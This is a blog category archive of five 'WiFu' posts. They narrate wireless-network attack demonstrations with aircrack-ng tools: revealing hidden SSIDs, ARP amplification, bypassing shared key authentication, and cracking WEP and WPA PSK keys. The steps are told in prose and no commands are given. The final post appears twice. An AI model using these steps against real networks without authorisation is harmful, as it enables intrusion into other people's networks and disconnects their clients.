Category Archives: WiFu

WiFu – Breaking Hidden Networks

0
Filed under WiFu

In this demonstration, I attempt to break into a hidden network. These networks won’t allow you to connect them like the usual network as you won’t be able to see it as it does not broadcast its SSID.

Firstly after activating monitor mode on my Alfa AWUS036H adapter, I started airodump-ng on channel 6 and listened for any networks.

After noticing the hidden network I stopped airodump-ng and started it again on channel 6 and to save the captured data to a file called hidden.

Noticing there was an already authenticated client I started up aireplay-ng and attempted to de-authenticate the client forcing it to re-authenticate with the network revealing that the hidden SSID was in fact Cisco.

After we discovered the SSID I attempted to authenticate with the network Cisco and started the ARP Request Replay attack to increase the rate of new IV’s generated and crack the WEP key for the network.

WiFu – ARP Amplification

0
Filed under WiFu

Using ARP to our advantage can greatly increase our IV generate rates. ARP amplification is a very advanced topic and this should not be attempted by new comers.

In this demonstration, I first performed a standard 1 – 1 attack by creating a generic ARP broadcast request and our injection rates were around 400, which is considered pretty good.

While attacking a network it is possible to find out the address ranges that are used and even associated client’s IP using attacks like the Korek Chop Chop attack. With this information you can more than double your IV generation rates by sending an ARP request to a existing WiFi client which will create a 1 -3 IV generation rate.

WiFu – Bypassing Shared Key Authentication

0
Filed under WiFu

When attacking a WEP encrypted WiFi network you can come across two different authentication methods, Open and Shared Key. In the the previous video we attacked an Open WEP network, so this time we are going to attack a SKA WEP network.

In this video, I started aireplay-ng and try to authenticate but quickly realise it’s not an open network and aireplay-ng switched to Shared Key authentication.

Next I started up airodump-ng on channel 6 and to save the captured data to a file called ‘linksys,’ next I attempted to de-authenticate an associated client meaning that they would have to complete a new SKA, which we would capture.

Once captured we are able to use this captured SKA when we try and associate, which works fine for us and we successfully authenticated with the target network.

Like in the previous video, we proceed to capture the PRGA so that we can craft our own packets for the network and create broadcast ARP request packets in the hope that the Access Point will respond with a new IV, and finally we crack the WEP encryption key for the network using aircrack-ng.

WiFu – Cracking Clientless WEP

0
Filed under WiFu

In this video, I demonstrate how to authenticate with a client-less WEP Open network and breaking the WEP key in a relatively short amount of time using various aircrack-ng tools

I was using Back|Track 4 R1 in this video but the default driver doesn’t work too well with my AWUS036H USB WiFi card, so I removed the new drivers and loaded the older Back|Track 3 drivers

The next step I took was to enable monitor mode on my wireless card using airmon-ng and starting airodump-ng on channel 6 to see what was about

After I identified the target network, I started up screen and ran airodump-ng again on channel 6 and to output the captured data to a file called ‘linksys’

I then attempted to perform a fake authentication attack with the target network using aireplay-ng and started listening for data packet from the clientless network (can take up to 5 minutes) so that I could obtain a PRGA for the network which would allow me to create my own packets for later injection

Once obtained I use packetforge-ng to create a generic ARP Request packet using the broadcast range 255.255.255.255 as most wireless Access Points respond to these, and hopefully would create new IV’s for the target network

Using the newly crafted packet, I used aireplay-ng again to inject this packet, which caused the Access Point to produce new IV’s

Once enough IV’s were captured I used aircrack-ng to work out the HEX encryption code for the network

WiFu – Cracking WPA PSK

0
Filed under WiFu

In this video, I demonstrate the simplicity of cracking a PSK password using tools freely available within the aircrack-ng suite of tools

I first put my Alfa AWUS036H USB WiFi card into monitor mode and proceeded to listen for WiFi traffic on channel 6 and noted down information

I needed to be able to have airodump-ng running during the next stages so I ran screen and started airodump-ng again to continue my attack

Once I had found an associated client, I created another session and using aireplay-ng I sent a de-authentication packet to this client in the hope that the client would re-authenticate with the target network

Once I had captured the PSK handshake, I stopped airodump-ng and proceeded to crack the PSK using a brute-force method with the tool aircrack-ng and the example dictionary that comes with the aircrack-ng suite
In this video, I demonstrate the simplicity of cracking a PSK password using tools freely available within the aircrack-ng suite of tools

I first put my Alfa AWUS036H USB WiFi card into monitor mode and proceeded to listen for WiFi traffic on channel 6 and noted down information

I needed to be able to have airodump-ng running during the next stages so I ran screen and started airodump-ng again to continue my attack

Once I had found an associated client, I created another session and using aireplay-ng I sent a de-authentication packet to this client in the hope that the client would re-authenticate with the target network

Once I had captured the PSK handshake, I stopped airodump-ng and proceeded to crack the PSK using a brute-force method with the tool aircrack-ng and the example dictionary that comes with the aircrack-ng suite